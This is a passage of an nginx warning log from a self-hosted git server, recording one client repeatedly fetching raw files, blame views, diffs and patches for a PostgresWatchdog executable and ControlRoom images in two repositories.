13:12:09 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/05/0000014055 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist/PostgresWatchdog.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist/PostgresWatchdog.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist/PostgresWatchdog.exe" -2026/02/17 13:13:08 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/05/0000014056 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -2026/02/17 13:13:21 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/05/0000014057 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist/PostgresWatchdog.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist/PostgresWatchdog.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist/PostgresWatchdog.exe" -2026/02/17 13:15:13 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/05/0000014058 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e.diff HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e.diff", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" -2026/02/17 13:15:34 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/05/0000014059 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -2026/02/17 13:15:53 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/06/0000014060 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c.patch", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" -2026/02/17 13:18:09 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/06/0000014061 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d.diff HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d.diff", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" -2026/02/17 13:20:49 [warn] 917#917: *49234 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/06/0000014062 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0.patch", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0" -2026/02/17 13:22:49 [warn] 917#917: *49234 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/06/0000014063 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d.patch", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" -2026/02/17 13:24:28 [warn] 917#917: *49234 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/06/0000014064 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e.patch", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" -2026/02/17 13:25:18 [warn] 917#917: *49234 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/06/0000014065 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6.patch", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" -2026/02/17 13:34:01 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/06/0000014066 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?show-outdated=&style=split&whitespace=ignore-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?show-outdated=&style=split&whitespace=ignore-all", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?show-outdated=&style=split&whitespace=ignore-change" -2026/02/17 13:36:02 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/06/0000014067 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png" -2026/02/17 13:38:43 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/07/0000014071 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html" -2026/02/17 13:39:22 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/07/0000014072 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png" -2026/02/17 13:39:28 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/07/0000014073 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png" -2026/02/17 13:39:34 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/07/0000014074 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png" -2026/02/17 13:39:41 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/07/0000014075 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png" -2026/02/17 13:39:45 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/07/0000014076 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html" -2026/02/17 13:39:48 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/07/0000014077 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" -2026/02/17 13:39:50 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/07/0000014078 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html" -2026/02/17 13:39:57 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/07/0000014079 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png" -2026/02/17 13:40:04 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/08/0000014080 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png" -2026/02/17 13:40:11 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/08/0000014081 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png" -2026/02/17 13:40:19 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/08/0000014082 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png" -2026/02/17 13:40:26 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/08/0000014083 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png" -2026/02/17 13:40:34 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/08/0000014084 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png" -2026/02/17 13:40:38 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/08/0000014085 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png" -2026/02/17 13:40:42 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/08/0000014086 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html" -2026/02/17 13:40:52 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/08/0000014087 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png" -2026/02/17 13:40:58 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/08/0000014088 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png" -2026/02/17 13:41:06 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/08/0000014089 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom5.png" -2026/02/17 13:41:14 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/09/0000014090 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png" -2026/02/17 13:41:20 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/09/0000014091 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png" -2026/02/17 13:41:27 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/09/0000014092 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png" -2026/02/17 13:41:34 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/09/0000014093 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png" -2026/02/17 13:41:38 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/09/0000014094 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png" -2026/02/17 13:41:53 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/09/0000014095 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png" -2026/02/17 13:42:00 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/09/0000014096 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png" -2026/02/17 13:42:08 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/09/0000014097 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png" -2026/02/17 13:42:15 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/09/0000014098 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png" -2026/02/17 13:42:22 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/09/0000014099 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png" -2026/02/17 13:42:29 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/10/0000014100 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png" -2026/02/17 13:42:35 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/10/0000014101 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: 